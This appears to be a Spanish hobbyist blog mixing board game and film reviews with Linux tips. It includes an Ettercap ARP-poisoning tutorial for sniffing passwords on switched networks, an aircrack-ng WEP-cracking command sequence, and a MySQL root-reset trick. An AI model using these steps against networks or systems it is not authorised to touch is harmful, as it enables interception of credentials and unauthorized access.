Cenobita de 8 Bits

El Horror de Arkham

En pocas palabras juego de mesa tipo “Horror Survival” con toques de RPG dentro del universo de Lovecraft y Los Mitos del Cthulhy -:). Es cooperativo con un nivel de dificultad medio, por lo extensas que son las reglas, pero en tres partidas le coges el truco y ya van las partidas rápidas

Lo mas curioso del juego es que pueden jugar de 1 - 8 jugadores, si 1, ya que el turno del malo se regula mediante el azar de las cartas.

El objetivo del juego es impedir que un malvado monstruo aka Chutlu, Yig o cualquier otro primigenio entren a la tierra a traves de portales, para ello con nuestros personajes deberemos movernos por las localizaciones consiguiendo objetos, hechizos que nos ayuden a encontrar los portales y cerrarlos, mientras luchamos con los pequeño monstruitos que han ido apareciendo a lo largo de los turnos.

Nuestro personaje tiene diferentes tipos de habilidades que podremos ir mejorando para pelear mejor, soportar el terror de ver los bichejos, o mejorar la habilidad de lanzar hechizos. También tiene puntos de vida, que siempre son escasos, que nos dira las ostias que aguanta, y los puntos de cordura, que sera lo duro que es nuestro personaje a ver los bicherjos o cosas raras que le vayan pasando. Nuestros personajes no morirán ya que al perder o los puntos de vida o de cordura, se ira al hospital o al manicomio para recuperarse .

Asusta ver la mesa tan llena de fichitas, cartas, tarjetas….

Cada turno un personaje se mueve por la ciudad (el tablero) consiguiendo pistas, que no son mas que ayudas para realizar las tiradas, comprando objetos y matando los chinchos que pululan por la ciudad. Al finalizar el turno del jugador, le toca el turno al malvado monstruo primigenio que quiere despertar, sus acciones vienen dadas sacando cartas de una baraja, que contiene instrucciones para abrir un portal en alguna localización, sacar chinchos y moverlos, y algunas veces saldran situaciones especiales para incrementar la dificultad del juego, ya sea mejorando los chinchos de la ciudad o cerrando localizaciones como la tienda, el hospital, etc…

Cuando juegas las primeras veces, quieres hacerte miembro de la logia pq piensas que habra obejtos o cosas mas chulas, ¡NADA MAS LEJOS DE LA REALIDAD! de 10 cartas que tiene la logia solo 1 es buena XDD

En resumen es un juego muy entretenido, para jugar de 3-5 personas, con un nivel medio de complejidad, y nivel alto para ganarle la partida a la “maquina”, por la cantidad de monstruos jodidos, putadas que  salen, que algunas veces es mejor estarte quieto que investigando las localizaciones en busca de objetos por las ostias que te llevas.

Un video de una partida completa, 5 jugadores, 3 horas de partida

http://www.youtube.com/watch?v=msSwRxTf06o

R-O-Matic: 9.5

Para poder acceder por red a las maquinas que corren bajo Virtualbox, debemore hacerlo a traves de un interfaz TAP.

Instalar los modulos

modprobe tap

Guardar en un script y ejecutarlo antes de cada maquina.

vbox_tap.sh

tunctl -t tap1 -u USUARIO_QUE_CORRE_VBOX
ip link set up dev tap1

brctl addbr br0
brctl addif br0 tap1
ip link set up dev br0.
ip addr add 10.1.1.1/24 dev br0
# ip route add 10.1.1.0/24 dev br0
echo 1 > /proc/sys/net/ipv4/ip_forward.
iptables -t nat -A POSTROUTING -o eth0 -j MASQUERADE

En la maquina Virtualbox, elegir como red “Interface Anfitrión” y en “Interface Name” poner tap1.

Al arrancar, un nuevo interfaz habrá aparecido, lo configuramos con una ip de la subred 10.1.1.0/24  y ya podemos acceder a nuestra maquina de vbox

Pasos para realizar sniffing en redes conmutadas (swtich)

Ettercap es una serie de herramientas para realizar ataques “Man in the middle” en redes LAN. Es decir es capaz de ver todo el trafico que pasa por tu segmento de red y modificarlo al vuelo. Soporta todo tipo de conexiones, incluso SSL con certificados autofirmados. Tiene la posibilidad de hacer scripts y filtros, para automatizar tareas.

Instalación en modo debian

apt-get install ettercap

Como buen taliban de consola lo arrancaremos en modo ncruses

# ettercap -C

Activamos el sniffing

sniff -> unified sniffing

Elegir interfaz del segmento que queramos leer (eth0, wlan1, etc…)

Buscamos las ips que estan vivas en este segmento

Host -> Scan for host

Asi rellenaremos la lista de host disponibles para poder activar el ataque por ARP. No es necesario seleccionar un objetivo si solo queremos ver el trafico

Host -> Hosts List

Empieza la fiesta

Start -> Start Sniffing

MITM -> Arp poisoning…[X] Sniff remote conections

O si es en modo ncurses, poner como parameter: remote

Y ahora a esperar, en la ventana de log, iran apareciendo claves, urls, datos que va sacando gracias a los plugins que lleva activados. Para muestra, lo que ha visto en mi red.

Se ve que el ultimo es un acceso a gmail, funciona en SSL, pero da errores en los certificados.

En el siguiente articulo veremos los plugins, y como cambiar contenido de los paquetes en tiempo real, como cambiar todas las fotos por una que nosotros elijamos.

[+] Info: http://ettercap.sourceforge.net/

1. airodump -c CANAL -w SALIDA wlan1
2. aireplay-ng -1 10 -e ESSID  wlan1
3. aireplay-ng -4 -e ESSID  [-h MAC_ATACANTE] wlan1
4. packetforge-ng -0 -a MAC_AP -h MAC_ATACANTE -k 255.255.255.255 -l 255.255.255.255.255 -y REPLAY.XOR -w REPLAY-arp
5. aireplay-ng -2  -r REPLAY-arp wlan1
6. aircrack-ng *.cap

(Sustituir mayúsculas por datos de la prueba)

[+] Info: www.aircrack-ng.org

Librerias que hacen falta para compilar los google gadgets

apt-get install build-essential autoconf automake libtool libcurl4-openssl-dev libdbus-1-dev libgstreamer-plugins-base0.10-dev libgtk2.0-dev  ibmozjs-dev libqt4-dev libqt4-opengl-dev librsvg2-dev libxml2-dev libxul-dev xulrunner

Copiar discos o particiones por red con los comandos netcat y dd

¡¡¡UTILISIMO!!! Sobre todo cuando le cambias al pobre eeepc el SO 20 veces en un fin de semana xDDD

Origen:

dd if=/dev/sda | nc 192.168.1.220 8000

Destino:

nc -l -p 9000 | dd of=/dev/sda

Se copia el disco entero, con el mbr y todo las demas tonterias tipicas del disco xD

Error de configuración en Apache2, que puede derivar en un XSS.

Asi que lo mejor es anular esta opción.

Para comprobar si la tenemos activada:
telnet 127.0.0.1 80
Trying 127.0.0.1…
Connected to 127.0.0.1.
Escape character is ‘^]’.
TRACE / HTTP/1.0
Host: ejemplo
Esto de aqui sera vuelto a enviar otra vez <- Pulsar “Enter” dos veces

HTTP/1.1 200 OK
Date: Wed, 15 Oct 2008 00:00:00 GMT
Server: Apache/2.2.6 (Debian)
Connection: close
Content-Type: message/http

TRACE / HTTP/1.0
Host: ejemplo
Esto de aqui sera vuelto a enviar otra vez

Connection closed by foreign host.

Así que lo mejor es desactivar el trace a traves de la configuracion editando y añadiendo:

/etc/apache2/apache2.conf

TraceEnable off

Ala un ayuda menos para los malos xD

“Un disparo perfecto, un ángulo imposible”, con esa frase se resume la película.

Asesinos,tiros y puñaladas con efectos tipo Matrix, un poquito de humor Postal2, y ruiditos de flashback de Lost.

Momentazo Postal2 en que el protagonista usa un cadáver como silenciador para su arma

Película para pasar el rato entretenido, con alguna risa, y para verle el culo a la Angelina “Jolines como esta”

Robando a Necro, la puntuare

R-Rating-O-Matic : 6

Si se te olvida la contraseña de algún usuario de MySQL y tienes acceso shell a la consola para poder arrancar y parar el MySQL haz:

# /usr/bin/mysqld_safe –skip-grant-tables &

# mysql -u root

Milagrooooo, no pide contraseña

mysql> use mysql;
mysql> UPDATE user SET Password=PASSWORD(”nueva_contraseña“) WHERE User=”root”;
mysql> flush privileges;

Salimos de la sesion. Matamos el MySQL que anda corriendo por ahi, y ahora lo lanzamos de forma normal.

Ya tendremos la contraseña cambiada a la que hemos querido. Y todo ¡¡en menos de 5 min!!

Comando para el VIM para quitar el efecto escalera a la hora de pegar el texto.

Que no se te olvide ¡JAMAS! xD

:set noai

-:)